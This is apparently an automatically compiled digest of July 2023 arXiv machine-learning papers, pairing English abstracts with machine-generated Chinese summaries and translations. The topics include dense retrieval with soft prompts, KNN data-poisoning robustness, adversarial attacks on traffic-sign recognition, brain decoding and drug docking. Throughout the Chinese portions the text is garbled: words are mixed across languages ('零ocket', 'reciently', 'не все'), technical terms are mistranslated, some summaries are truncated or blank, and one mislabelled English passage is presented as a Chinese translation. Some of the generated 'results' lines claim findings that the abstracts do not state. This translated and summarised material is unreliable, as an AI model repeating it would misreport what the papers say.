目的：用视频镜头导航是肺间化学疗法中不可或缺的一种重要需求。现代解决方案主要关注于基于电磁场追踪和在手术过程中对先前的CT扫描图进行图像匹配的医学器械导航。但是，需要患者特定的CT扫描图的使用限制了导航导航的使用范围只能用于血液急救室等其他应用。方法：本文提出一种具有视频镜头导航功能的新方法，与现有方法不同之处在于完全没有使用电磁场追踪和患者特定的CT扫描图。导航是基于气管内部空间模型和视频镜头数据进行的，具有较高的准确率和可靠性。结果：我们在肺脏模型中进行了多次实验，结果表明，通过利用空间和时间上的约束和图像分类的权重补做，我们可以提高准确率至0.98（weighted F1 score: 0.98），比对ividual帧的分类结果（0.81）高出了17.6%。结论：我们在空间和时间上具有约束的HMM模型中结合了CNN基于单帧图像分类和空间约束，实现了没有电磁场追踪和患者特定CT扫描图的视频镜头导航。这种方法可以在肺间化学疗法中提供更加可靠和高效的导航导航。

Soft Prompt Tuning for Augmenting Dense Retrieval with Large Language Models

paper_url: http://arxiv.org/abs/2307.08303
repo_url: https://github.com/zhiyuanpeng/sptar
paper_authors: Zhiyuan Peng, Xuyang Wu, Yi Fang
for: 提高 dense retrieval 模型的性能，尤其是在lacking domain-specific training data的情况下。
methods: 使用 soft prompt tuning 方法，通过优化任务特定的软提示来提高 LLMs 生成的弱查询语句质量，然后使用这些弱查询语句来训练任务特定的 dense retriever。
results: SPTAR 方法在不supervised baselines BM25 和 LLMs-based augmentation method 的基础上具有更高的性能，可以提高 dense retrieval 模型的搜索效果。

Abstract
Dense retrieval (DR) converts queries and documents into dense embeddings and measures the similarity between queries and documents in vector space. One of the challenges in DR is the lack of domain-specific training data. While DR models can learn from large-scale public datasets like MS MARCO through transfer learning, evidence shows that not all DR models and domains can benefit from transfer learning equally. Recently, some researchers have resorted to large language models (LLMs) to improve the zero-shot and few-shot DR models. However, the hard prompts or human-written prompts utilized in these works cannot guarantee the good quality of generated weak queries. To tackle this, we propose soft prompt tuning for augmenting DR (SPTAR): For each task, we leverage soft prompt-tuning to optimize a task-specific soft prompt on limited ground truth data and then prompt the LLMs to tag unlabeled documents with weak queries, yielding enough weak document-query pairs to train task-specific dense retrievers. We design a filter to select high-quality example document-query pairs in the prompt to further improve the quality of weak tagged queries. To the best of our knowledge, there is no prior work utilizing soft prompt tuning to augment DR models. The experiments demonstrate that SPTAR outperforms the unsupervised baselines BM25 and the recently proposed LLMs-based augmentation method for DR.

摘要
dense retrieval (DR) 将查询和文档转换为紧凑表示并在 vector 空间中度量查询和文档之间的相似性。DR 的一个挑战是缺乏域pecific 训练数据。虽然 DR 模型可以通过转移学习从大规模公共数据集如 MS MARCO 学习，但证据表明不 все DR 模型和领域可以受益于转移学习相同。 reciently，一些研究人员已经使用大语言模型 (LLMs) 来提高零ocket 和几ocket DR 模型。然而，使用的 hard prompts 或人工写的 prompts 无法保证生成的弱 queries 的好质量。为了解决这个问题，我们提出了软提示调整 для增强 DR (SPTAR)：对每个任务，我们利用软提示调整来优化任务特定的软提示，然后使用 LLMs 将标注无标注文档，生成足够的弱文档-查询对以训练任务特定的紧凑检索器。我们设计了一个筛选器来选择高质量的示例文档-查询对，以进一步提高弱标注查询的质量。到目前为止，没有什么先进的工作利用软提示调整来增强 DR 模型。实验表明，SPTAR 超过了无监督基准和最近提出的基于 LLMs 的增强方法。

GBT: Two-stage transformer framework for non-stationary time series forecasting

paper_url: http://arxiv.org/abs/2307.08302
repo_url: https://github.com/origamisl/gbt
paper_authors: Li Shen, Yuning Wei, Yangzhu Wang
for: 本研究旨在解决时间序列预测变换器（TSFT）的严重过拟合问题，尤其是在处理非站ARY时间序列时。
methods: 我们提出了一种新的两阶段变换器框架，称为Good Beginning Transformer（GBT），它将TSFT的预测过程分解成两个阶段：自动回归阶段和自我回归阶段。在自动回归阶段，预测结果作为一个更好的初始化方法，并在自我回归阶段进行进一步的预测。
results: 我们在七个基准数据集上进行了广泛的实验，结果显示GBT在预测能力方面超过了现有的TSFT和其他预测模型（SCINet、N-HiTS等），并且具有较低的时间和空间复杂度。GBT还可以与这些模型结合使用，以增强其预测能力。

Abstract
This paper shows that time series forecasting Transformer (TSFT) suffers from severe over-fitting problem caused by improper initialization method of unknown decoder inputs, esp. when handling non-stationary time series. Based on this observation, we propose GBT, a novel two-stage Transformer framework with Good Beginning. It decouples the prediction process of TSFT into two stages, including Auto-Regression stage and Self-Regression stage to tackle the problem of different statistical properties between input and prediction sequences.Prediction results of Auto-Regression stage serve as a Good Beginning, i.e., a better initialization for inputs of Self-Regression stage. We also propose Error Score Modification module to further enhance the forecasting capability of the Self-Regression stage in GBT. Extensive experiments on seven benchmark datasets demonstrate that GBT outperforms SOTA TSFTs (FEDformer, Pyraformer, ETSformer, etc.) and many other forecasting models (SCINet, N-HiTS, etc.) with only canonical attention and convolution while owning less time and space complexity. It is also general enough to couple with these models to strengthen their forecasting capability. The source code is available at: https://github.com/OrigamiSL/GBT

摘要
To further enhance the forecasting capability of GBT, we propose an Error Score Modification module. This module adjusts the error scores of the Self-Regression stage to better handle the difference in statistical properties between the input and prediction sequences.Our extensive experiments on seven benchmark datasets show that GBT outperforms state-of-the-art TSFTs (FEDformer, Pyraformer, ETSformer, etc.) and other forecasting models (SCINet, N-HiTS, etc.) with only canonical attention and convolution, while requiring less time and space complexity. Additionally, GBT is general enough to be combined with these models to strengthen their forecasting capability. The source code is available at: .

Systematic Testing of the Data-Poisoning Robustness of KNN

paper_url: http://arxiv.org/abs/2307.08288
repo_url: None
paper_authors: Yannan Li, Jingbo Wang, Chao Wang
for: 这篇论文目的是提高机器学习基于训练集的软件组件的数据欺走抵触性。
methods: 该论文提出了一种系统测试基于方法，可以证明和证伪数据欺走 robustness。
results: 该方法比基eline枚举方法快速和准确，可以快速缩小搜索空间，并通过系统测试在具体空间找到实际的违反。测试结果表明，该方法可以有效地判断k- nearest neighbors（KNN）预测结果的数据欺走Robustness。

Abstract
Data poisoning aims to compromise a machine learning based software component by contaminating its training set to change its prediction results for test inputs. Existing methods for deciding data-poisoning robustness have either poor accuracy or long running time and, more importantly, they can only certify some of the truly-robust cases, but remain inconclusive when certification fails. In other words, they cannot falsify the truly-non-robust cases. To overcome this limitation, we propose a systematic testing based method, which can falsify as well as certify data-poisoning robustness for a widely used supervised-learning technique named k-nearest neighbors (KNN). Our method is faster and more accurate than the baseline enumeration method, due to a novel over-approximate analysis in the abstract domain, to quickly narrow down the search space, and systematic testing in the concrete domain, to find the actual violations. We have evaluated our method on a set of supervised-learning datasets. Our results show that the method significantly outperforms state-of-the-art techniques, and can decide data-poisoning robustness of KNN prediction results for most of the test inputs.

摘要
“数据毒化”是一种攻击机器学习基础的软件元件，通过污染它的训练集，让它的预测结果对测试输入进行变化。现有的方法可以评估数据毒化Robustness，但是它们的精度受限，或者执行时间很长，而且它们只能认证一些真正可靠的情况，但是无法确定不可靠的情况。为了解决这个限制，我们提出了一个系统性的测试方法，可以确定以及否定数据毒化Robustness，这个方法在一个广泛使用的超过近边法（KNN）上进行了评估。我们的方法比基准枚举方法更快和更精度，是因为我们使用了一种新的抽象领域中的误差分析，快速地缩小搜索空间，并且在实际领域中进行系统性的测试，实际找到了违背的情况。我们在一些超过近边法的数据上进行了评估，结果显示，我们的方法可以在大多数的测试输入上实现数据毒化Robustness的决定。”

Going Beyond Linear Mode Connectivity: The Layerwise Linear Feature Connectivity

paper_url: http://arxiv.org/abs/2307.08286
repo_url: None
paper_authors: Zhanpeng Zhou, Yongyi Yang, Xiaojiang Yang, Junchi Yan, Wei Hu
for: 本研究探讨了神经网络训练过程中的一些有趣实验现象，包括Linear Mode Connectivity（LMC）等。
methods: 本研究使用了多种方法来探讨LMC和Layerwise Linear Feature Connectivity（LLFC）的现象，包括随机排序和生成新的网络等。
results: 研究发现，当两个训练过的网络满足LMC时，它们通常也满足LLFC在大多数层次。此外，研究还探讨了LLFC的下面因素，提供了新的思路和技术来理解LMC和LLFC。

Abstract
Recent work has revealed many intriguing empirical phenomena in neural network training, despite the poorly understood and highly complex loss landscapes and training dynamics. One of these phenomena, Linear Mode Connectivity (LMC), has gained considerable attention due to the intriguing observation that different solutions can be connected by a linear path in the parameter space while maintaining near-constant training and test losses. In this work, we introduce a stronger notion of linear connectivity, Layerwise Linear Feature Connectivity (LLFC), which says that the feature maps of every layer in different trained networks are also linearly connected. We provide comprehensive empirical evidence for LLFC across a wide range of settings, demonstrating that whenever two trained networks satisfy LMC (via either spawning or permutation methods), they also satisfy LLFC in nearly all the layers. Furthermore, we delve deeper into the underlying factors contributing to LLFC, which reveal new insights into the spawning and permutation approaches. The study of LLFC transcends and advances our understanding of LMC by adopting a feature-learning perspective.

摘要

Complexity Matters: Rethinking the Latent Space for Generative Modeling

paper_url: http://arxiv.org/abs/2307.08283
repo_url: None
paper_authors: Tianyang Hu, Fei Chen, Haonan Wang, Jiawei Li, Wenjia Wang, Jiacheng Sun, Zhenguo Li
for: 本研究旨在探讨generative模型中latent space的选择，尤其是如何选择最佳的latent space，以提高generative性能。
methods: 我们提出了一种基于模型复杂度的latent space选择方法，并提出了一种两阶段训练策略called Decoupled Autoencoder (DAE)，可以改善latent distribution并提高生成性能。
results: 我们的理论分析和实验结果表明，DAE可以提高sample质量，同时降低模型的复杂度。

Abstract
In generative modeling, numerous successful approaches leverage a low-dimensional latent space, e.g., Stable Diffusion models the latent space induced by an encoder and generates images through a paired decoder. Although the selection of the latent space is empirically pivotal, determining the optimal choice and the process of identifying it remain unclear. In this study, we aim to shed light on this under-explored topic by rethinking the latent space from the perspective of model complexity. Our investigation starts with the classic generative adversarial networks (GANs). Inspired by the GAN training objective, we propose a novel "distance" between the latent and data distributions, whose minimization coincides with that of the generator complexity. The minimizer of this distance is characterized as the optimal data-dependent latent that most effectively capitalizes on the generator's capacity. Then, we consider parameterizing such a latent distribution by an encoder network and propose a two-stage training strategy called Decoupled Autoencoder (DAE), where the encoder is only updated in the first stage with an auxiliary decoder and then frozen in the second stage while the actual decoder is being trained. DAE can improve the latent distribution and as a result, improve the generative performance. Our theoretical analyses are corroborated by comprehensive experiments on various models such as VQGAN and Diffusion Transformer, where our modifications yield significant improvements in sample quality with decreased model complexity.

摘要
在生成模型中，许多成功的方法利用低维度的隐藏空间，例如稳定扩散模型，通过一个匹配的解码器生成图像。although the selection of the latent space is crucial, determining the optimal choice and the process of identifying it remain unclear. In this study, we aim to shed light on this under-explored topic by rethinking the latent space from the perspective of model complexity. Our investigation starts with the classic generative adversarial networks (GANs). Inspired by the GAN training objective, we propose a novel "distance" between the latent and data distributions, whose minimization coincides with that of the generator complexity. The minimizer of this distance is characterized as the optimal data-dependent latent that most effectively capitalizes on the generator's capacity. Then, we consider parameterizing such a latent distribution by an encoder network and propose a two-stage training strategy called Decoupled Autoencoder (DAE), where the encoder is only updated in the first stage with an auxiliary decoder and then frozen in the second stage while the actual decoder is being trained. DAE can improve the latent distribution and as a result, improve the generative performance. Our theoretical analyses are corroborated by comprehensive experiments on various models such as VQGAN and Diffusion Transformer, where our modifications yield significant improvements in sample quality with decreased model complexity.Here's the translation in Traditional Chinese:在生成模型中，许多成功的方法利用低维度的隐藏空间，例如稳定扩散模型，通过一个匹配的解码器生成图像。although the selection of the latent space is crucial, determining the optimal choice and the process of identifying it remain unclear. In this study, we aim to shed light on this under-explored topic by rethinking the latent space from the perspective of model complexity. Our investigation starts with the classic generative adversarial networks (GANs). Inspired by the GAN training objective, we propose a novel "distance" between the latent and data distributions, whose minimization coincides with that of the generator complexity. The minimizer of this distance is characterized as the optimal data-dependent latent that most effectively capitalizes on the generator's capacity. Then, we consider parameterizing such a latent distribution by an encoder network and propose a two-stage training strategy called Decoupled Autoencoder (DAE), where the encoder is only updated in the first stage with an auxiliary decoder and then frozen in the second stage while the actual decoder is being trained. DAE can improve the latent distribution and as a result, improve the generative performance. Our theoretical analyses are corroborated by comprehensive experiments on various models such as VQGAN and Diffusion Transformer, where our modifications yield significant improvements in sample quality with decreased model complexity.

Certifying the Fairness of KNN in the Presence of Dataset Bias

paper_url: http://arxiv.org/abs/2307.08722
repo_url: None
paper_authors: Yannan Li, Jingbo Wang, Chao Wang
for: The paper is written for certifying the fairness of the classification result of the k-nearest neighbors (KNN) algorithm under the assumption of historical bias in the training data.
methods: The paper proposes a method for certifying fairness based on three variants of fairness definitions: individual fairness, $\epsilon$-fairness, and label-flipping fairness. The method uses sound approximations of the complex arithmetic computations used in the state-of-the-art KNN algorithm to reduce computational cost.
results: The paper shows the effectiveness of the proposed method through experimental evaluation on six widely used datasets in the fairness research literature. The method is able to obtain fairness certifications for a large number of test inputs despite the presence of historical bias in the datasets.

Abstract
We propose a method for certifying the fairness of the classification result of a widely used supervised learning algorithm, the k-nearest neighbors (KNN), under the assumption that the training data may have historical bias caused by systematic mislabeling of samples from a protected minority group. To the best of our knowledge, this is the first certification method for KNN based on three variants of the fairness definition: individual fairness, $\epsilon$-fairness, and label-flipping fairness. We first define the fairness certification problem for KNN and then propose sound approximations of the complex arithmetic computations used in the state-of-the-art KNN algorithm. This is meant to lift the computation results from the concrete domain to an abstract domain, to reduce the computational cost. We show effectiveness of this abstract interpretation based technique through experimental evaluation on six datasets widely used in the fairness research literature. We also show that the method is accurate enough to obtain fairness certifications for a large number of test inputs, despite the presence of historical bias in the datasets.

摘要
我们提出了一种方法，用于证明某种广泛使用的直接学习算法（k-最近邻）的分类结果是否公平，假设训练数据可能受到历史偏见的影响，特别是保护少数群体样本的系统化错误标注。根据我们所知，这是第一种基于三种公平定义（个体公平、ε-公平和标签抓取公平）的公平证明方法。我们首先定义了公平证明问题，然后提出了使用现代KNN算法中的复杂数学计算的准确估计方法，以减少计算成本。我们通过实验评估六个广泛用于公平研究文献中的数据集，并证明了这种抽象计算方法的有效性。我们还证明了方法可以快速获得大量测试输入的公平证明，即使训练数据中存在历史偏见。

Automated Action Model Acquisition from Narrative Texts

paper_url: http://arxiv.org/abs/2307.10247
repo_url: None
paper_authors: Ruiqi Li, Leyang Cui, Songtuan Lin, Patrik Haslum
for: 本研究旨在提高AI代理人的规划技术应用，通过自动从叙述文本中提取струк成事件和生成 планинг语言风格的动作模型。
methods: 本研究使用了自动提取叙述文本中的结构事件，并通过预测通用常识事件关系、文本矛盾和相似性来生成 planning-language-style 动作模型。
results: 实验结果表明，NaRuto可以在经典叙述规划领域生成高质量的动作模型，与现有的完全自动方法相当，甚至与半自动方法相当。

Abstract
Action models, which take the form of precondition/effect axioms, facilitate causal and motivational connections between actions for AI agents. Action model acquisition has been identified as a bottleneck in the application of planning technology, especially within narrative planning. Acquiring action models from narrative texts in an automated way is essential, but challenging because of the inherent complexities of such texts. We present NaRuto, a system that extracts structured events from narrative text and subsequently generates planning-language-style action models based on predictions of commonsense event relations, as well as textual contradictions and similarities, in an unsupervised manner. Experimental results in classical narrative planning domains show that NaRuto can generate action models of significantly better quality than existing fully automated methods, and even on par with those of semi-automated methods.

摘要
文本翻译为简化中文。<>行动模型，即前提/效果axioms，为AI代理人提供了 causal 和 motivational 连接。行动模型获取被识别为规划技术应用的瓶颈，尤其在叙述规划领域。自动从叙述文本中获取行动模型是重要，但具有内在复杂性。我们提出了NaRuto系统，该系统通过预测常识事件关系以及文本矛盾和相似性来自动生成 планинг语言风格的行动模型，并在经验领域中达到了现有完全自动方法的水平。

Adversarial Attacks on Traffic Sign Recognition: A Survey

paper_url: http://arxiv.org/abs/2307.08278
repo_url: None
paper_authors: Svetlana Pavlitska, Nico Lambing, J. Marius Zöllner
for: 本研究旨在探讨攻击 autonomous driving 系统的可能性，尤其是针对交通标识模型的攻击。
methods: 本研究准确地描述了现有的攻击方法，包括数字和实际攻击。
results: 研究发现，现有的攻击方法可以轻松地破坏交通标识模型的正常工作，需要进一步的研究以减少这些攻击的风险。

Abstract
Traffic sign recognition is an essential component of perception in autonomous vehicles, which is currently performed almost exclusively with deep neural networks (DNNs). However, DNNs are known to be vulnerable to adversarial attacks. Several previous works have demonstrated the feasibility of adversarial attacks on traffic sign recognition models. Traffic signs are particularly promising for adversarial attack research due to the ease of performing real-world attacks using printed signs or stickers. In this work, we survey existing works performing either digital or real-world attacks on traffic sign detection and classification models. We provide an overview of the latest advancements and highlight the existing research areas that require further investigation.

摘要
自动驾驶车辆的辨识功能中，交通标志识别是一个关键组件，目前大多使用深度神经网络（DNN）来实现。但是，DNN受到恶意攻击的可能性很高。先前的研究已经证明了对交通标志识别模型的攻击的可能性。由于交通标志的易攻击性，使得实际攻击更加容易。在这种情况下，我们对现有的数字和实际攻击研究进行了抽象和概述，并高亮了需要进一步研究的领域。

Deep Neural Networks and Brain Alignment: Brain Encoding and Decoding (Survey)

paper_url: http://arxiv.org/abs/2307.10246
repo_url: None
paper_authors: Subba Reddy Oota, Manish Gupta, Raju S. Bapi, Gael Jobard, Frederic Alexandre, Xavier Hinaut
for: 研究大脑如何表示不同的信息模式，以及设计一个系统可以自动理解用户的思维？
methods: 使用 функциональ磁共振成像（fMRI）记录大脑活动，并提出了多种基于深度学习的编码和解码模型。
results: 这些模型可以用于评估和诊断神经科学问题，以及设计大脑机器或计算机界面。

Abstract
How does the brain represent different modes of information? Can we design a system that automatically understands what the user is thinking? Such questions can be answered by studying brain recordings like functional magnetic resonance imaging (fMRI). As a first step, the neuroscience community has contributed several large cognitive neuroscience datasets related to passive reading/listening/viewing of concept words, narratives, pictures and movies. Encoding and decoding models using these datasets have also been proposed in the past two decades. These models serve as additional tools for basic research in cognitive science and neuroscience. Encoding models aim at generating fMRI brain representations given a stimulus automatically. They have several practical applications in evaluating and diagnosing neurological conditions and thus also help design therapies for brain damage. Decoding models solve the inverse problem of reconstructing the stimuli given the fMRI. They are useful for designing brain-machine or brain-computer interfaces. Inspired by the effectiveness of deep learning models for natural language processing, computer vision, and speech, recently several neural encoding and decoding models have been proposed. In this survey, we will first discuss popular representations of language, vision and speech stimuli, and present a summary of neuroscience datasets. Further, we will review popular deep learning based encoding and decoding architectures and note their benefits and limitations. Finally, we will conclude with a brief summary and discussion about future trends. Given the large amount of recently published work in the `computational cognitive neuroscience' community, we believe that this survey nicely organizes the plethora of work and presents it as a coherent story.

摘要
如何让脑子表示不同的信息？我们可以通过研究脑电图像（fMRI）来回答这些问题。脑科学社区已经提供了许多大量的认知神经科学数据集，这些数据集关于静止阅读/听取/观看概念词、故事、图片和电影。使用这些数据集，以前已经提出了编码和解码模型。这些模型可以用于基础研究认知科学和神经科学。编码模型可以自动生成脑电图像，它们有许多实际应用，如诊断和治疗神经系统疾病。解码模型可以 reconstruction 脑电图像，它们有用于设计脑机或脑计算机界面。鼓励于深度学习模型在自然语言处理、计算机视觉和语音处理等领域的效果，最近几年有很多 neural encoding 和 decoding 模型被提出。在这篇评论中，我们将首先讲讲语言、视觉和听说 stimuli 的受欢迎表示，并提供脑科学数据集的摘要。然后，我们将回顾深度学习基于编码和解码架构的一些模型，并注意它们的优点和局限性。最后，我们将结束于简要的总结和讨论，并讨论未来的趋势。由于最近出版的大量工作在 'computational cognitive neuroscience' 社区，我们认为这篇评论 nicely 组织了这些工作，并将它们表现为一个coherent 的故事。

Transferable Graph Neural Fingerprint Models for Quick Response to Future Bio-Threats

paper_url: http://arxiv.org/abs/2308.01921
repo_url: None
paper_authors: Wei Chen, Yihui Ren, Ai Kagawa, Matthew R. Carbone, Samuel Yen-Chi Chen, Xiaohui Qu, Shinjae Yoo, Austin Clyde, Arvind Ramanathan, Rick L. Stevens, Hubertus J. J. van Dam, Deyu Liu
for: 这个论文的目的是为了快速屏测药物分子，以便在药物发现过程中快速搜索出有效的药物候选者。
methods: 这个论文使用的方法是基于蛋白质绑定亲和力的图 neural fingerprint方法，这种方法可以在高速和高准确性之间进行药物 docking 模拟。
results: 这个论文的结果表明，使用图 neural fingerprint方法可以对 COVID-19 药物 docking 问题进行高效的虚拟屏测，并且其预测精度比传统的圆形指纹方法更高， сред平方误差小于 $0.21$ kcal/mol。此外， authors 还提出了一种可以适用于未知目标的转移性图 neural fingerprint方法，该方法可以在多个目标上进行训练，并且与特定目标的图 neural fingerprint模型具有相似的准确性。

Abstract
Fast screening of drug molecules based on the ligand binding affinity is an important step in the drug discovery pipeline. Graph neural fingerprint is a promising method for developing molecular docking surrogates with high throughput and great fidelity. In this study, we built a COVID-19 drug docking dataset of about 300,000 drug candidates on 23 coronavirus protein targets. With this dataset, we trained graph neural fingerprint docking models for high-throughput virtual COVID-19 drug screening. The graph neural fingerprint models yield high prediction accuracy on docking scores with the mean squared error lower than $0.21$ kcal/mol for most of the docking targets, showing significant improvement over conventional circular fingerprint methods. To make the neural fingerprints transferable for unknown targets, we also propose a transferable graph neural fingerprint method trained on multiple targets. With comparable accuracy to target-specific graph neural fingerprint models, the transferable model exhibits superb training and data efficiency. We highlight that the impact of this study extends beyond COVID-19 dataset, as our approach for fast virtual ligand screening can be easily adapted and integrated into a general machine learning-accelerated pipeline to battle future bio-threats.

摘要
Translated into Simplified Chinese:快速药物探测基于药物结合亲和力是药物发现管道中一个重要步骤。图像神经指纹是一种有前途的方法，可以快速、高精度地实现药物对抗体结合。在这项研究中，我们建立了一个COVID-19药物探测集合，包含约300,000个药物候选者，对23种新型冠状病毒蛋白目标进行了探测。使用这些数据集，我们训练了图像神经指纹对高通量虚拟COVID-19药物探测进行了训练。图像神经指纹模型在多数探测目标上显示了高精度预测吸附分数，与传统径向指纹方法相比，显示了明显的改善。为使 neural fingerprint 可以应用于未知目标，我们还提出了多目标图像神经指纹方法。与特定目标图像神经指纹模型相比，多目标模型在训练和数据效率方面表现出色。我们强调，这项研究的影响不仅限于COVID-19数据集，我们的方法可以轻松地适应和整合到一个通用的机器学习加速管道中，以应对未来的生物威胁。

Evaluating and Enhancing Robustness of Deep Recommendation Systems Against Hardware Errors

paper_url: http://arxiv.org/abs/2307.10244
repo_url: https://github.com/vu-detail/pytei
paper_authors: Dongning Ma, Xun Jiao, Fred Lin, Mengshi Zhang, Alban Desmaison, Thomas Sellinger, Daniel Moore, Sriram Sankar
for: 这 paper 是关于深度推荐系统（DRS）的可靠性研究，以寻找在大规模队列系统中发现的硬件错误对 DRS 的影响。
methods: 这 paper 使用了 PyTorch 构建了一个简单、高效、可扩展的错误插入框架（Terrorch），以测试 DRS 的可靠性。
results: 研究发现，DRS 对硬件错误的抵抗力受到多种因素的影响，包括模型参数和输入特征。研究还发现，使用活动clipping可以提高 AUC-ROC 分数，达到30%的恢复率。

Abstract
Deep recommendation systems (DRS) heavily depend on specialized HPC hardware and accelerators to optimize energy, efficiency, and recommendation quality. Despite the growing number of hardware errors observed in large-scale fleet systems where DRS are deployed, the robustness of DRS has been largely overlooked. This paper presents the first systematic study of DRS robustness against hardware errors. We develop Terrorch, a user-friendly, efficient and flexible error injection framework on top of the widely-used PyTorch. We evaluate a wide range of models and datasets and observe that the DRS robustness against hardware errors is influenced by various factors from model parameters to input characteristics. We also explore 3 error mitigation methods including algorithm based fault tolerance (ABFT), activation clipping and selective bit protection (SBP). We find that applying activation clipping can recover up to 30% of the degraded AUC-ROC score, making it a promising mitigation method.

摘要
深度推荐系统（DRS）强依赖特殊的高性能计算硬件和加速器来优化能效和推荐质量。尽管大规模队列系统中DRS的可靠性受到许多硬件错误的影响，但DRS的可靠性问题还尚未得到足够的关注。本文提出了DRS可靠性对硬件错误的首次系统性研究。我们开发了一个简单、高效和灵活的错误插入框架——Terrorch，并在PyTorch上实现。我们对各种模型和数据集进行了广泛的测试，发现DRS对硬件错误的可靠性受到多种因素的影响，从模型参数到输入特征。我们还探讨了3种错误缓解方法，包括算法基于缺陷tolerance（ABFT）、活动截断和选择性位保护（SBP）。我们发现通过实施活动截断可以恢复30%的降低的AUC-ROC分数，这表明这是一种有前途的缓解方法。

Convex Bi-Level Optimization Problems with Non-smooth Outer Objective Function

paper_url: http://arxiv.org/abs/2307.08245
repo_url: None
paper_authors: Roey Merchav, Shoham Sabach
for: 解决 convex bi-level 优化问题
methods: 提出 Bi-Sub-Gradient (Bi-SG) 方法，基于 classical sub-gradient 方法的一种泛化
results: Bi-SG 方法可以在 convex bi-level 优化问题中实现 sub-线性速率，并且如果外部目标函数具有强度 convexity，可以提高外部速率至线性速率。此外，我们证明 Bi-SG 方法生成的序列与 bi-level 优化问题的优化解的距离 converges to zero.

Abstract
In this paper, we propose the Bi-Sub-Gradient (Bi-SG) method, which is a generalization of the classical sub-gradient method to the setting of convex bi-level optimization problems. This is a first-order method that is very easy to implement in the sense that it requires only a computation of the associated proximal mapping or a sub-gradient of the outer non-smooth objective function, in addition to a proximal gradient step on the inner optimization problem. We show, under very mild assumptions, that Bi-SG tackles bi-level optimization problems and achieves sub-linear rates both in terms of the inner and outer objective functions. Moreover, if the outer objective function is additionally strongly convex (still could be non-smooth), the outer rate can be improved to a linear rate. Last, we prove that the distance of the generated sequence to the set of optimal solutions of the bi-level problem converges to zero.

摘要
在本文中，我们提出了Bi-Sub-Gradient（Bi-SG）方法，这是对凸二级优化问题的一种普适化。这是一种一阶方法，只需计算相关的贸易映射或外层非凸目标函数的子gradient，以及内部优化问题的质量步骤。我们证明，在非常轻松的假设下，Bi-SG可以解决二级优化问题，并在内部和外部目标函数上实现下行速率。此外，如果外层目标函数另外是强Converter (仍然可能是非凸)，我们可以提高外层速率到线性速率。最后，我们证明生成的序列与二级优化问题的最佳解集的距离 converge to zero。

A Look into Causal Effects under Entangled Treatment in Graphs: Investigating the Impact of Contact on MRSA Infection

paper_url: http://arxiv.org/abs/2307.08237
repo_url: None
paper_authors: Jing Ma, Chen Chen, Anil Vullikanti, Ritwick Mishra, Gregory Madden, Daniel Borrajo, Jundong Li
for: The paper is written to study the problem of causal effect estimation with treatment entangled in a graph, and to propose a novel method (NEAT) to tackle this challenge.
methods: The proposed method NEAT explicitly leverages the graph structure to model the treatment assignment mechanism, and mitigates confounding biases based on the treatment assignment modeling.
results: The proposed method is validated through experiments on both synthetic datasets and a real-world MRSA dataset, and provides effective results in estimating causal effects with entangled treatments.

Abstract
Methicillin-resistant Staphylococcus aureus (MRSA) is a type of bacteria resistant to certain antibiotics, making it difficult to prevent MRSA infections. Among decades of efforts to conquer infectious diseases caused by MRSA, many studies have been proposed to estimate the causal effects of close contact (treatment) on MRSA infection (outcome) from observational data. In this problem, the treatment assignment mechanism plays a key role as it determines the patterns of missing counterfactuals -- the fundamental challenge of causal effect estimation. Most existing observational studies for causal effect learning assume that the treatment is assigned individually for each unit. However, on many occasions, the treatments are pairwisely assigned for units that are connected in graphs, i.e., the treatments of different units are entangled. Neglecting the entangled treatments can impede the causal effect estimation. In this paper, we study the problem of causal effect estimation with treatment entangled in a graph. Despite a few explorations for entangled treatments, this problem still remains challenging due to the following challenges: (1) the entanglement brings difficulties in modeling and leveraging the unknown treatment assignment mechanism; (2) there may exist hidden confounders which lead to confounding biases in causal effect estimation; (3) the observational data is often time-varying. To tackle these challenges, we propose a novel method NEAT, which explicitly leverages the graph structure to model the treatment assignment mechanism, and mitigates confounding biases based on the treatment assignment modeling. We also extend our method into a dynamic setting to handle time-varying observational data. Experiments on both synthetic datasets and a real-world MRSA dataset validate the effectiveness of the proposed method, and provide insights for future applications.

摘要
MRSA（多剂肠炎杆菌）是一种抗药菌，它的感染难以预防。在抗生素耗用多年的尝试下，许多研究被提出来估计MRSA感染的 causal effect，从观察数据中获得。在这个问题中，治疗分配机制扮演着关键的角色，它确定了潜在的缺失对照数据的模式——基本挑战 causal effect 估计。大多数现有的观察数据研究假设每个单元都 individually 接受了治疗。然而，在许多情况下，治疗是在图表中连接的单元之间分配的，即不同单元的治疗是 entangled 的。忽略这些杂合的治疗可能会妨碍 causal effect 估计。在这篇文章中，我们研究了图表中的 causal effect 估计问题。虽然有一些对 entangled 治疗的探索，但这个问题仍然具有挑战，因为：（1）杂合带来了对 treatment assignment mechanism 的模型和利用的困难;（2）可能存在隐藏的假设因素，导致 causal effect 估计受到抵消的影响;（3）观察数据通常是时间变化的。为了解决这些挑战，我们提出了一种新方法 NEAT，它明确利用图表结构来模型治疗分配机制，并根据治疗分配模型来减少假设因素的影响。我们还将方法推广到动态设定，以处理时间变化的观察数据。在 synthetic 数据和一个实际MRSA数据上进行了实验，并证明了我们的方法的有效性，并提供了未来应用的参考。

HeroLT: Benchmarking Heterogeneous Long-Tailed Learning

paper_url: http://arxiv.org/abs/2307.08235
repo_url: https://github.com/ssskj/herolt
paper_authors: Haohui Wang, Weijie Guan, Jianpeng Chen, Zi Wang, Dawei Zhou
for: 本研究旨在提供一个系统性的长尾学习视角，涵盖数据长尾性、域困难度和新任务多样性等三个纬度。
methods: 本研究开发了包括13种现状之最先进算法和6种评价指标的最全面的长尾学习 benchmark 名为 HeroLT，并在14个真实 benchmark 数据集上进行了264项实验。
results: 研究人员通过对 HeroLT benchmark 进行了全面的实验和分析，并提出了一些有 Promise 的未来方向。

Abstract
Long-tailed data distributions are prevalent in a variety of domains, including finance, e-commerce, biomedical science, and cyber security. In such scenarios, the performance of machine learning models is often dominated by the head categories, while the learning of tail categories is significantly inadequate. Given abundant studies conducted to alleviate the issue, this work aims to provide a systematic view of long-tailed learning with regard to three pivotal angles: (A1) the characterization of data long-tailedness, (A2) the data complexity of various domains, and (A3) the heterogeneity of emerging tasks. To achieve this, we develop the most comprehensive (to the best of our knowledge) long-tailed learning benchmark named HeroLT, which integrates 13 state-of-the-art algorithms and 6 evaluation metrics on 14 real-world benchmark datasets across 4 tasks from 3 domains. HeroLT with novel angles and extensive experiments (264 in total) enables researchers and practitioners to effectively and fairly evaluate newly proposed methods compared with existing baselines on varying types of datasets. Finally, we conclude by highlighting the significant applications of long-tailed learning and identifying several promising future directions. For accessibility and reproducibility, we open-source our benchmark HeroLT and corresponding results at https://github.com/SSSKJ/HeroLT.

摘要
